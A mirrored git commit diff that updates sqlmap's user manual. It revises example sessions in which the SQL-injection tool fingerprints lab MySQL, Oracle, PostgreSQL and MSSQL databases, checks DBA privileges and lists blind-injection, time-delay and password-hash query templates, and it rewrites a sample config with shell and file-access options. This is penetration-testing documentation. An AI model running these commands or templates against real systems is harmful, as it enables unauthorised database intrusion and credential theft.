mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-25 11:03:47 +03:00
Updated user's manual
This commit is contained in:
parent
981c7a4428
commit
193482a62b
296
doc/README.html
296
doc/README.html
|
@ -2207,11 +2207,13 @@ page content.</P>
|
||||||
|
|
||||||
<P>By default the web application's back-end database management system
|
<P>By default the web application's back-end database management system
|
||||||
fingerprint is performed requesting a database specific function which
|
fingerprint is performed requesting a database specific function which
|
||||||
returns a known static value. By comparing this value with the returned
|
returns a known static value. By comparing these value with the returned
|
||||||
value it is possible to identify if the back-end database is effectively
|
value it is possible to identify if the back-end database is effectively
|
||||||
the one that sqlmap expected.</P>
|
the one that sqlmap expected. Depending on the DBMS being tested, a
|
||||||
|
SQL dialect syntax which is syntatically correct depending upon the
|
||||||
|
back-end DBMS is also tested.</P>
|
||||||
<P>After identifying an injectable vector, sqlmap fingerprints the back-end
|
<P>After identifying an injectable vector, sqlmap fingerprints the back-end
|
||||||
database management system and go ahead with the injection with their
|
database management system and go ahead with the injection with its
|
||||||
specific syntax within the limits of the database architecture.</P>
|
specific syntax within the limits of the database architecture.</P>
|
||||||
|
|
||||||
<P>Example on a <B>MySQL 5.0.67</B> target:</P>
|
<P>Example on a <B>MySQL 5.0.67</B> target:</P>
|
||||||
|
@ -2221,17 +2223,12 @@ specific syntax within the limits of the database architecture.</P>
|
||||||
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 1
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 1
|
||||||
|
|
||||||
[...]
|
[...]
|
||||||
[hh:mm:14] [INFO] testing MySQL
|
[hh:mm:17] [INFO] testing MySQL
|
||||||
[hh:mm:14] [INFO] query: CONCAT(CHAR(51), CHAR(51))
|
[hh:mm:17] [INFO] confirming MySQL
|
||||||
[hh:mm:14] [INFO] retrieved: 33
|
[hh:mm:17] [INFO] query: SELECT 5 FROM information_schema.TABLES LIMIT 0, 1
|
||||||
[hh:mm:14] [INFO] performed 20 queries in 0 seconds
|
[hh:mm:17] [INFO] retrieved: 5
|
||||||
[hh:mm:14] [INFO] confirming MySQL
|
[hh:mm:17] [INFO] performed 13 queries in 0 seconds
|
||||||
[hh:mm:14] [INFO] query: LENGTH(CHAR(51))
|
[hh:mm:17] [INFO] the back-end DBMS is MySQL
|
||||||
[hh:mm:14] [INFO] retrieved: 1
|
|
||||||
[hh:mm:14] [INFO] performed 13 queries in 0 seconds
|
|
||||||
[hh:mm:14] [INFO] query: SELECT 3 FROM information_schema.TABLES LIMIT 0, 1
|
|
||||||
[hh:mm:14] [INFO] retrieved: 3
|
|
||||||
[hh:mm:14] [INFO] performed 13 queries in 0 seconds
|
|
||||||
web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
|
web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
|
||||||
web application technology: PHP 5.2.6, Apache 2.2.9
|
web application technology: PHP 5.2.6, Apache 2.2.9
|
||||||
back-end DBMS: MySQL >= 5.0.0
|
back-end DBMS: MySQL >= 5.0.0
|
||||||
|
@ -2253,27 +2250,22 @@ messages, you can provide the <CODE>--fingerprint</CODE> option.</P>
|
||||||
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 1 -f
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 1 -f
|
||||||
|
|
||||||
[...]
|
[...]
|
||||||
[hh:mm:14] [INFO] testing MySQL
|
[hh:mm:49] [INFO] testing MySQL
|
||||||
[hh:mm:14] [INFO] query: CONCAT(CHAR(52), CHAR(52))
|
[hh:mm:49] [INFO] confirming MySQL
|
||||||
[hh:mm:14] [INFO] retrieved: 44
|
[hh:mm:49] [INFO] query: SELECT 3 FROM information_schema.TABLES LIMIT 0, 1
|
||||||
[hh:mm:14] [INFO] performed 20 queries in 0 seconds
|
[hh:mm:49] [INFO] retrieved: 3
|
||||||
[hh:mm:14] [INFO] confirming MySQL
|
[hh:mm:49] [INFO] performed 13 queries in 0 seconds
|
||||||
[hh:mm:14] [INFO] query: LENGTH(CHAR(52))
|
[hh:mm:49] [INFO] the back-end DBMS is MySQL
|
||||||
[hh:mm:14] [INFO] retrieved: 1
|
[hh:mm:49] [INFO] query: SELECT 3 FROM information_schema.PARAMETERS LIMIT 0, 1
|
||||||
[hh:mm:14] [INFO] performed 13 queries in 0 seconds
|
[hh:mm:49] [INFO] retrieved:
|
||||||
[hh:mm:14] [INFO] query: SELECT 4 FROM information_schema.TABLES LIMIT 0, 1
|
[hh:mm:49] [INFO] performed 6 queries in 0 seconds
|
||||||
[hh:mm:14] [INFO] retrieved: 4
|
[hh:mm:49] [INFO] query: MID(@@table_open_cache, 1, 1)
|
||||||
[hh:mm:14] [INFO] performed 13 queries in 0 seconds
|
[hh:mm:49] [INFO] retrieved:
|
||||||
[hh:mm:14] [INFO] query: SELECT 4 FROM information_schema.PARAMETERS LIMIT 0, 1
|
[hh:mm:49] [INFO] performed 6 queries in 0 seconds
|
||||||
[hh:mm:14] [INFO] retrieved:
|
[hh:mm:49] [INFO] query: MID(@@hostname, 1, 1)
|
||||||
[hh:mm:14] [INFO] performed 6 queries in 0 seconds
|
[hh:mm:49] [INFO] retrieved: t
|
||||||
[hh:mm:14] [INFO] query: MID(@@plugin_dir, 1, 1)
|
[hh:mm:49] [INFO] performed 13 queries in 0 seconds
|
||||||
[hh:mm:14] [INFO] retrieved:
|
[hh:mm:49] [INFO] executing MySQL comment injection fingerprint
|
||||||
[hh:mm:14] [INFO] performed 6 queries in 0 seconds
|
|
||||||
[hh:mm:14] [INFO] query: MID(@@hostname, 1, 1)
|
|
||||||
[hh:mm:14] [INFO] retrieved: n
|
|
||||||
[hh:mm:14] [INFO] performed 13 queries in 0 seconds
|
|
||||||
[hh:mm:14] [INFO] executing MySQL comment injection fingerprint
|
|
||||||
web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
|
web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
|
||||||
web application technology: PHP 5.2.6, Apache 2.2.9
|
web application technology: PHP 5.2.6, Apache 2.2.9
|
||||||
back-end DBMS: active fingerprint: MySQL >= 5.0.38 and < 5.1.2
|
back-end DBMS: active fingerprint: MySQL >= 5.0.38 and < 5.1.2
|
||||||
|
@ -2290,19 +2282,17 @@ back-end DBMS: active fingerprint: MySQL >= 5.0.38 and < 5.1.2
|
||||||
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" -v 1 -f
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" -v 1 -f
|
||||||
|
|
||||||
[...]
|
[...]
|
||||||
[hh:mm:26] [WARNING] the back-end DMBS is not MySQL
|
[hh:mm:38] [WARNING] the back-end DMBS is not MySQL
|
||||||
[hh:mm:26] [INFO] testing Oracle
|
[hh:mm:38] [INFO] testing Oracle
|
||||||
[hh:mm:26] [INFO] query: LENGTH(SYSDATE)
|
[hh:mm:38] [INFO] confirming Oracle
|
||||||
[hh:mm:26] [INFO] retrieved: 9
|
[hh:mm:38] [INFO] the back-end DBMS is Oracle
|
||||||
[hh:mm:26] [INFO] performed 13 queries in 0 seconds
|
[hh:mm:38] [INFO] query: SELECT SUBSTR((VERSION), 1, 2) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1
|
||||||
[hh:mm:26] [INFO] confirming Oracle
|
[hh:mm:38] [INFO] retrieved: 10
|
||||||
[hh:mm:26] [INFO] query: SELECT VERSION FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1
|
[hh:mm:38] [INFO] performed 20 queries in 0 seconds
|
||||||
[hh:mm:26] [INFO] retrieved: 10.2.0.1.0
|
|
||||||
[hh:mm:27] [INFO] performed 76 queries in 0 seconds
|
|
||||||
web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
|
web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
|
||||||
web application technology: PHP 5.2.6, Apache 2.2.9
|
web application technology: PHP 5.2.6, Apache 2.2.9
|
||||||
back-end DBMS: active fingerprint: Oracle 10g
|
back-end DBMS: active fingerprint: Oracle 10g
|
||||||
html error message fingerprint: Oracle
|
html error message fingerprint: Oracle
|
||||||
</PRE>
|
</PRE>
|
||||||
</CODE></BLOCKQUOTE>
|
</CODE></BLOCKQUOTE>
|
||||||
</P>
|
</P>
|
||||||
|
@ -2314,21 +2304,16 @@ back-end DBMS: active fingerprint: Oracle 10g
|
||||||
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -v 1 -f
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -v 1 -f
|
||||||
|
|
||||||
[...]
|
[...]
|
||||||
[hh:mm:48] [WARNING] the back-end DMBS is not Oracle
|
[hh:mm:14] [WARNING] the back-end DMBS is not Oracle
|
||||||
[hh:mm:48] [INFO] testing PostgreSQL
|
[hh:mm:14] [INFO] testing PostgreSQL
|
||||||
[hh:mm:48] [INFO] query: COALESCE(6, NULL)
|
[hh:mm:14] [INFO] confirming PostgreSQL
|
||||||
[hh:mm:48] [INFO] retrieved: 6
|
[hh:mm:14] [INFO] the back-end DBMS is PostgreSQL
|
||||||
[hh:mm:48] [INFO] performed 13 queries in 0 seconds
|
[hh:mm:14] [INFO] query: SUBSTR(TRANSACTION_TIMESTAMP()::text, 1, 1)
|
||||||
[hh:mm:48] [INFO] confirming PostgreSQL
|
[hh:mm:14] [INFO] retrieved: 2
|
||||||
[hh:mm:48] [INFO] query: LENGTH(CHR(54))
|
[hh:mm:14] [INFO] performed 13 queries in 0 seconds
|
||||||
[hh:mm:48] [INFO] retrieved: 1
|
[hh:mm:14] [INFO] query: SUBSTR(TRANSACTION_TIMESTAMP(), 1, 1)
|
||||||
[hh:mm:48] [INFO] performed 13 queries in 0 seconds
|
[hh:mm:14] [INFO] retrieved:
|
||||||
[hh:mm:48] [INFO] query: SUBSTR(TRANSACTION_TIMESTAMP()::text, 1, 1)
|
[hh:mm:14] [INFO] performed 6 queries in 0 seconds
|
||||||
[hh:mm:48] [INFO] retrieved: 2
|
|
||||||
[hh:mm:48] [INFO] performed 13 queries in 0 seconds
|
|
||||||
[hh:mm:48] [INFO] query: SUBSTR(TRANSACTION_TIMESTAMP(), 1, 1)
|
|
||||||
[hh:mm:48] [INFO] retrieved:
|
|
||||||
[hh:mm:48] [INFO] performed 6 queries in 0 seconds
|
|
||||||
web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
|
web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
|
||||||
web application technology: PHP 5.2.6, Apache 2.2.9
|
web application technology: PHP 5.2.6, Apache 2.2.9
|
||||||
back-end DBMS: active fingerprint: PostgreSQL >= 8.3.0
|
back-end DBMS: active fingerprint: PostgreSQL >= 8.3.0
|
||||||
|
@ -2350,12 +2335,8 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" -v 1
|
||||||
[...]
|
[...]
|
||||||
[hh:mm:41] [WARNING] the back-end DMBS is not PostgreSQL
|
[hh:mm:41] [WARNING] the back-end DMBS is not PostgreSQL
|
||||||
[hh:mm:41] [INFO] testing Microsoft SQL Server
|
[hh:mm:41] [INFO] testing Microsoft SQL Server
|
||||||
[hh:mm:41] [INFO] query: LTRIM(STR(LEN(7)))
|
[hh:mm:41] [INFO] confirming Microsoft SQL Server
|
||||||
[hh:mm:41] [INFO] retrieved: 1
|
[hh:mm:41] [INFO] the back-end DBMS is Microsoft SQL Server
|
||||||
[hh:mm:41] [INFO] performed 13 queries in 0 seconds
|
|
||||||
[hh:mm:41] [INFO] query: SELECT SUBSTRING((@@VERSION), 25, 1)
|
|
||||||
[hh:mm:41] [INFO] retrieved: 0
|
|
||||||
[hh:mm:41] [INFO] performed 13 queries in 0 seconds
|
|
||||||
web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
|
web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
|
||||||
web application technology: PHP 5.2.6, Apache 2.2.9
|
web application technology: PHP 5.2.6, Apache 2.2.9
|
||||||
back-end DBMS: active fingerprint: Microsoft SQL Server 2000
|
back-end DBMS: active fingerprint: Microsoft SQL Server 2000
|
||||||
|
@ -2371,14 +2352,10 @@ back-end DBMS: active fingerprint: Microsoft SQL Server 2000
|
||||||
$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 1 -f
|
$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 1 -f
|
||||||
|
|
||||||
[...]
|
[...]
|
||||||
[hh:mm:51] [WARNING] the back-end DMBS is not PostgreSQL
|
[hh:mm:41] [WARNING] the back-end DMBS is not PostgreSQL
|
||||||
[hh:mm:51] [INFO] testing Microsoft SQL Server
|
[hh:mm:41] [INFO] testing Microsoft SQL Server
|
||||||
[hh:mm:51] [INFO] query: LTRIM(STR(LEN(0)))
|
[hh:mm:41] [INFO] confirming Microsoft SQL Server
|
||||||
[hh:mm:51] [INFO] retrieved: 1
|
[hh:mm:41] [INFO] the back-end DBMS is Microsoft SQL Server
|
||||||
[hh:mm:51] [INFO] performed 13 queries in 0 seconds
|
|
||||||
[hh:mm:51] [INFO] query: SELECT SUBSTRING((@@VERSION), 25, 1)
|
|
||||||
[hh:mm:51] [INFO] retrieved: 5
|
|
||||||
[hh:mm:51] [INFO] performed 13 queries in 0 seconds
|
|
||||||
web server operating system: Windows 2003 or 2000
|
web server operating system: Windows 2003 or 2000
|
||||||
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
|
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
|
||||||
back-end DBMS: active fingerprint: Microsoft SQL Server 2005
|
back-end DBMS: active fingerprint: Microsoft SQL Server 2005
|
||||||
|
@ -2397,30 +2374,25 @@ you can also provide the <CODE>-b</CODE> or <CODE>--banner</CODE> option.</P>
|
||||||
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 1 -f -b
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 1 -f -b
|
||||||
|
|
||||||
[...]
|
[...]
|
||||||
[hh:mm:24] [INFO] testing MySQL
|
[hh:mm:04] [INFO] testing MySQL
|
||||||
[hh:mm:24] [INFO] query: CONCAT(CHAR(52), CHAR(52))
|
[hh:mm:04] [INFO] confirming MySQL
|
||||||
[hh:mm:24] [INFO] retrieved: 44
|
[hh:mm:04] [INFO] query: SELECT 0 FROM information_schema.TABLES LIMIT 0, 1
|
||||||
[hh:mm:24] [INFO] performed 20 queries in 0 seconds
|
[hh:mm:04] [INFO] retrieved: 0
|
||||||
[hh:mm:24] [INFO] confirming MySQL
|
[hh:mm:04] [INFO] performed 13 queries in 0 seconds
|
||||||
[hh:mm:24] [INFO] query: LENGTH(CHAR(52))
|
[hh:mm:04] [INFO] the back-end DBMS is MySQL
|
||||||
[hh:mm:24] [INFO] retrieved: 1
|
[hh:mm:04] [INFO] query: VERSION()
|
||||||
[hh:mm:24] [INFO] performed 13 queries in 0 seconds
|
[hh:mm:04] [INFO] retrieved: 5.0.67-0ubuntu6
|
||||||
[hh:mm:24] [INFO] query: SELECT 4 FROM information_schema.TABLES LIMIT 0, 1
|
[hh:mm:05] [INFO] performed 111 queries in 1 seconds
|
||||||
[hh:mm:24] [INFO] retrieved: 4
|
[hh:mm:05] [INFO] query: SELECT 0 FROM information_schema.PARAMETERS LIMIT 0, 1
|
||||||
[hh:mm:24] [INFO] performed 13 queries in 0 seconds
|
[hh:mm:05] [INFO] retrieved:
|
||||||
[hh:mm:24] [INFO] query: VERSION()
|
[hh:mm:05] [INFO] performed 6 queries in 0 seconds
|
||||||
[hh:mm:24] [INFO] retrieved: 5.0.67-0ubuntu6
|
[hh:mm:05] [INFO] query: MID(@@table_open_cache, 1, 1)
|
||||||
[hh:mm:25] [INFO] performed 111 queries in 0 seconds
|
[hh:mm:05] [INFO] retrieved:
|
||||||
[hh:mm:25] [INFO] query: SELECT 4 FROM information_schema.PARAMETERS LIMIT 0, 1
|
[hh:mm:05] [INFO] performed 6 queries in 0 seconds
|
||||||
[hh:mm:25] [INFO] retrieved:
|
[hh:mm:05] [INFO] query: MID(@@hostname, 1, 1)
|
||||||
[hh:mm:25] [INFO] performed 6 queries in 0 seconds
|
[hh:mm:05] [INFO] retrieved: t
|
||||||
[hh:mm:25] [INFO] query: MID(@@plugin_dir, 1, 1)
|
[hh:mm:06] [INFO] performed 13 queries in 0 seconds
|
||||||
[hh:mm:25] [INFO] retrieved:
|
[hh:mm:06] [INFO] executing MySQL comment injection fingerprint
|
||||||
[hh:mm:25] [INFO] performed 6 queries in 0 seconds
|
|
||||||
[hh:mm:25] [INFO] query: MID(@@hostname, 1, 1)
|
|
||||||
[hh:mm:25] [INFO] retrieved: n
|
|
||||||
[hh:mm:25] [INFO] performed 13 queries in 0 seconds
|
|
||||||
[hh:mm:25] [INFO] executing MySQL comment injection fingerprint
|
|
||||||
web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
|
web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
|
||||||
web application technology: PHP 5.2.6, Apache 2.2.9
|
web application technology: PHP 5.2.6, Apache 2.2.9
|
||||||
back-end DBMS operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
|
back-end DBMS operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
|
||||||
|
@ -2445,11 +2417,8 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" -v 1
|
||||||
[...]
|
[...]
|
||||||
[hh:mm:03] [WARNING] the back-end DMBS is not PostgreSQL
|
[hh:mm:03] [WARNING] the back-end DMBS is not PostgreSQL
|
||||||
[hh:mm:03] [INFO] testing Microsoft SQL Server
|
[hh:mm:03] [INFO] testing Microsoft SQL Server
|
||||||
[hh:mm:03] [INFO] query: LTRIM(STR(LEN(3)))
|
[hh:mm:03] [INFO] confirming Microsoft SQL Server
|
||||||
[hh:mm:03] [INFO] retrieved: 1
|
[hh:mm:03] [INFO] the back-end DBMS is Microsoft SQL Server
|
||||||
[hh:mm:03] [INFO] performed 13 queries in 0 seconds
|
|
||||||
[hh:mm:03] [INFO] query: SELECT SUBSTRING((@@VERSION), 25, 1)
|
|
||||||
[hh:mm:03] [INFO] retrieved: 0
|
|
||||||
[hh:mm:03] [INFO] performed 13 queries in 0 seconds
|
[hh:mm:03] [INFO] performed 13 queries in 0 seconds
|
||||||
[hh:mm:03] [INFO] query: @@VERSION
|
[hh:mm:03] [INFO] query: @@VERSION
|
||||||
[hh:mm:03] [INFO] retrieved: Microsoft SQL Server 2000 - 8.00.194 (Intel X86)
|
[hh:mm:03] [INFO] retrieved: Microsoft SQL Server 2000 - 8.00.194 (Intel X86)
|
||||||
|
@ -2479,12 +2448,8 @@ $ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v
|
||||||
[...]
|
[...]
|
||||||
[hh:mm:03] [WARNING] the back-end DMBS is not PostgreSQL
|
[hh:mm:03] [WARNING] the back-end DMBS is not PostgreSQL
|
||||||
[hh:mm:03] [INFO] testing Microsoft SQL Server
|
[hh:mm:03] [INFO] testing Microsoft SQL Server
|
||||||
[hh:mm:03] [INFO] query: LTRIM(STR(LEN(8)))
|
[hh:mm:03] [INFO] confirming Microsoft SQL Server
|
||||||
[hh:mm:03] [INFO] retrieved: 1
|
[hh:mm:03] [INFO] the back-end DBMS is Microsoft SQL Server
|
||||||
[hh:mm:03] [INFO] performed 13 queries in 0 seconds
|
|
||||||
[hh:mm:03] [INFO] query: SELECT SUBSTRING((@@VERSION), 25, 1)
|
|
||||||
[hh:mm:03] [INFO] retrieved: 5
|
|
||||||
[hh:mm:03] [INFO] performed 13 queries in 0 seconds
|
|
||||||
[hh:mm:03] [INFO] query: @@VERSION
|
[hh:mm:03] [INFO] query: @@VERSION
|
||||||
[hh:mm:03] [INFO] retrieved: Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
|
[hh:mm:03] [INFO] retrieved: Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
|
||||||
Oct 14 2005 00:33:37
|
Oct 14 2005 00:33:37
|
||||||
|
@ -2648,13 +2613,12 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --is-
|
||||||
[...]
|
[...]
|
||||||
back-end DBMS: PostgreSQL
|
back-end DBMS: PostgreSQL
|
||||||
|
|
||||||
[hh:mm:52] [INFO] testing if current user is DBA
|
[hh:mm:49] [INFO] testing if current user is DBA
|
||||||
[hh:mm:52] [INFO] query: SELECT (CASE WHEN ((SELECT usesuper=true FROM pg_user WHERE
|
[hh:mm:49] [INFO] query: SELECT (CASE WHEN ((SELECT usesuper=true FROM pg_user WHERE
|
||||||
usename=CURRENT_USER OFFSET 0 LIMIT 1)=CHR(116)||CHR(114)||CHR(117)||CHR(101)) THEN 1
|
usename=CURRENT_USER OFFSET 0 LIMIT 1)) THEN 1 ELSE 0 END)
|
||||||
ELSE 0 END)
|
[hh:mm:49] [INFO] retrieved: 1
|
||||||
[hh:mm:52] [INFO] retrieved:
|
[hh:mm:50] [INFO] performed 13 queries in 0 seconds
|
||||||
[hh:mm:52] [INFO] performed 6 queries in 0 seconds
|
current user is DBA: 'True'
|
||||||
current user is DBA: 'False'
|
|
||||||
</PRE>
|
</PRE>
|
||||||
</CODE></BLOCKQUOTE>
|
</CODE></BLOCKQUOTE>
|
||||||
</P>
|
</P>
|
||||||
|
@ -3711,6 +3675,8 @@ SELECT usename, passwd FROM pg_shadow ORDER BY usename [3]:
|
||||||
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --sql-shell -v 0
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --sql-shell -v 0
|
||||||
|
|
||||||
sql> [TAB TAB]
|
sql> [TAB TAB]
|
||||||
|
LIMIT
|
||||||
|
(SELECT super_priv FROM mysql.user WHERE user=(SUBSTRING_INDEX(CURRENT_USER(), '@', 1)) LIMIT 0, 1)='Y'
|
||||||
AND ORD(MID((%s), %d, 1)) > %d
|
AND ORD(MID((%s), %d, 1)) > %d
|
||||||
CAST(%s AS CHAR(10000))
|
CAST(%s AS CHAR(10000))
|
||||||
COUNT(%s)
|
COUNT(%s)
|
||||||
|
@ -3722,14 +3688,16 @@ LIMIT %d, %d
|
||||||
MID((%s), %d, %d)
|
MID((%s), %d, %d)
|
||||||
ORDER BY %s ASC
|
ORDER BY %s ASC
|
||||||
SELECT %s FROM %s.%s
|
SELECT %s FROM %s.%s
|
||||||
SELECT column_name, column_type FROM information_schema.COLUMNS WHERE table_name='%s' AND
|
SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)
|
||||||
table_schema='%s'
|
SELECT column_name, column_type FROM information_schema.COLUMNS WHERE table_name='%s' AND table_schema='%s'
|
||||||
SELECT grantee FROM information_schema.USER_PRIVILEGES
|
SELECT grantee FROM information_schema.USER_PRIVILEGES
|
||||||
SELECT grantee, privilege_type FROM information_schema.USER_PRIVILEGES
|
SELECT grantee, privilege_type FROM information_schema.USER_PRIVILEGES
|
||||||
SELECT schema_name FROM information_schema.SCHEMATA
|
SELECT schema_name FROM information_schema.SCHEMATA
|
||||||
SELECT table_schema, table_name FROM information_schema.TABLES
|
SELECT table_schema, table_name FROM information_schema.TABLES
|
||||||
SELECT user, password FROM mysql.user
|
SELECT user, password FROM mysql.user
|
||||||
|
SLEEP(%d)
|
||||||
VERSION()
|
VERSION()
|
||||||
|
\s+LIMIT\s+([\d]+)\s*\,\s*([\d]+)
|
||||||
sql> SE[TAB]
|
sql> SE[TAB]
|
||||||
sql> SELECT
|
sql> SELECT
|
||||||
</PRE>
|
</PRE>
|
||||||
|
@ -3776,7 +3744,7 @@ table_schema=CHAR(116,101,115,116) LIMIT 2, 1
|
||||||
[hh:mm:48] [INFO] retrieved: surname
|
[hh:mm:48] [INFO] retrieved: surname
|
||||||
[hh:mm:48] [INFO] performed 55 queries in 0 seconds
|
[hh:mm:48] [INFO] performed 55 queries in 0 seconds
|
||||||
[hh:mm:48] [INFO] the query with column names is: SELECT id, name, surname FROM test.users
|
[hh:mm:48] [INFO] the query with column names is: SELECT id, name, surname FROM test.users
|
||||||
[hh:mm:48] [INPUT] does the SQL query that you provide might return multiple entries? [Y/n] y
|
[hh:mm:48] [INPUT] can the SQL query provided return multiple entries? [Y/n] y
|
||||||
[hh:mm:04] [INFO] query: SELECT IFNULL(CAST(COUNT(id) AS CHAR(10000)), CHAR(32)) FROM test.users
|
[hh:mm:04] [INFO] query: SELECT IFNULL(CAST(COUNT(id) AS CHAR(10000)), CHAR(32)) FROM test.users
|
||||||
[hh:mm:04] [INFO] retrieved: 5
|
[hh:mm:04] [INFO] retrieved: 5
|
||||||
[hh:mm:04] [INFO] performed 13 queries in 0 seconds
|
[hh:mm:04] [INFO] performed 13 queries in 0 seconds
|
||||||
|
@ -4218,78 +4186,81 @@ INI file, <CODE>sqlmap-SAUbs.conf</CODE>.</P>
|
||||||
$ cat sqlmap-SAUbs.conf
|
$ cat sqlmap-SAUbs.conf
|
||||||
|
|
||||||
[Target]
|
[Target]
|
||||||
googleDork =
|
|
||||||
list =
|
|
||||||
url = http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1
|
url = http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1
|
||||||
|
googledork =
|
||||||
|
list =
|
||||||
|
|
||||||
[Request]
|
[Request]
|
||||||
aCred =
|
threads = 1
|
||||||
aType =
|
useragentsfile =
|
||||||
|
atype =
|
||||||
agent =
|
agent =
|
||||||
cookie =
|
|
||||||
data =
|
|
||||||
delay = 0
|
delay = 0
|
||||||
headers =
|
headers =
|
||||||
method = GET
|
cookie =
|
||||||
proxy =
|
proxy =
|
||||||
|
timeout = 10
|
||||||
|
acred =
|
||||||
referer =
|
referer =
|
||||||
threads = 1
|
data =
|
||||||
timeout = None
|
method = GET
|
||||||
userAgentsFile =
|
|
||||||
|
|
||||||
[Miscellaneous]
|
[Miscellaneous]
|
||||||
batch = False
|
updateall = False
|
||||||
eta = False
|
eta = False
|
||||||
sessionFile =
|
verbose = 2
|
||||||
updateAll = False
|
batch = False
|
||||||
verbose = 1
|
sessionfile =
|
||||||
|
|
||||||
[Enumeration]
|
[Enumeration]
|
||||||
col =
|
dumpall = False
|
||||||
|
limitstop = 0
|
||||||
|
getusers = False
|
||||||
|
isdba = False
|
||||||
|
getpasswordhashes = False
|
||||||
|
excludesysdbs = False
|
||||||
|
getcurrentdb = False
|
||||||
|
gettables = False
|
||||||
|
dumptable = False
|
||||||
db =
|
db =
|
||||||
dumpAll = False
|
limitstart = 0
|
||||||
dumpTable = False
|
getprivileges = False
|
||||||
excludeSysDbs = False
|
sqlshell = False
|
||||||
getBanner = True
|
|
||||||
getColumns = False
|
|
||||||
getCurrentDb = False
|
|
||||||
getCurrentUser = False
|
|
||||||
getDbs = False
|
|
||||||
getPasswordHashes = False
|
|
||||||
getPrivileges = False
|
|
||||||
getTables = False
|
|
||||||
getUsers = False
|
|
||||||
limitStart = 0
|
|
||||||
limitStop = 0
|
|
||||||
query =
|
|
||||||
sqlShell = False
|
|
||||||
tbl =
|
tbl =
|
||||||
|
getcolumns = False
|
||||||
|
query =
|
||||||
|
getdbs = False
|
||||||
user =
|
user =
|
||||||
|
col =
|
||||||
|
getcurrentuser = False
|
||||||
|
getbanner = True
|
||||||
|
|
||||||
[File system]
|
[File system]
|
||||||
rFile =
|
wfile =
|
||||||
wFile =
|
rfile =
|
||||||
|
|
||||||
[Takeover]
|
[Takeover]
|
||||||
osShell = False
|
osshell = False
|
||||||
|
|
||||||
[Fingerprint]
|
[Fingerprint]
|
||||||
extensiveFp = False
|
extensivefp = False
|
||||||
|
|
||||||
[Injection]
|
[Injection]
|
||||||
|
estring =
|
||||||
dbms =
|
dbms =
|
||||||
eRegexp =
|
string =
|
||||||
eString =
|
|
||||||
postfix =
|
postfix =
|
||||||
prefix =
|
prefix =
|
||||||
|
testparameter =
|
||||||
regexp =
|
regexp =
|
||||||
string =
|
eregexp =
|
||||||
testParameter =
|
|
||||||
|
|
||||||
[Techniques]
|
[Techniques]
|
||||||
timeTest = False
|
stackedtest = False
|
||||||
unionTest = False
|
utech =
|
||||||
unionUse = False
|
unionuse = False
|
||||||
|
timetest = False
|
||||||
|
uniontest = False
|
||||||
</PRE>
|
</PRE>
|
||||||
</CODE></BLOCKQUOTE>
|
</CODE></BLOCKQUOTE>
|
||||||
</P>
|
</P>
|
||||||
|
@ -4303,7 +4274,6 @@ with the <CODE>-c</CODE> option as explained above in section 5.2:</P>
|
||||||
$ python sqlmap.py -c "sqlmap-SAUbs.conf"
|
$ python sqlmap.py -c "sqlmap-SAUbs.conf"
|
||||||
|
|
||||||
[...]
|
[...]
|
||||||
|
|
||||||
[hh:mm:16] [INFO] performed 657 queries in 6 seconds
|
[hh:mm:16] [INFO] performed 657 queries in 6 seconds
|
||||||
|
|
||||||
banner: 'PostgreSQL 8.3.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real
|
banner: 'PostgreSQL 8.3.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real
|
||||||
|
|
BIN
doc/README.pdf
BIN
doc/README.pdf
Binary file not shown.
275
doc/README.sgml
275
doc/README.sgml
|
@ -2135,20 +2135,20 @@ page content.
|
||||||
|
|
||||||
<sect2>Extensive database management system fingerprint
|
<sect2>Extensive database management system fingerprint
|
||||||
|
|
||||||
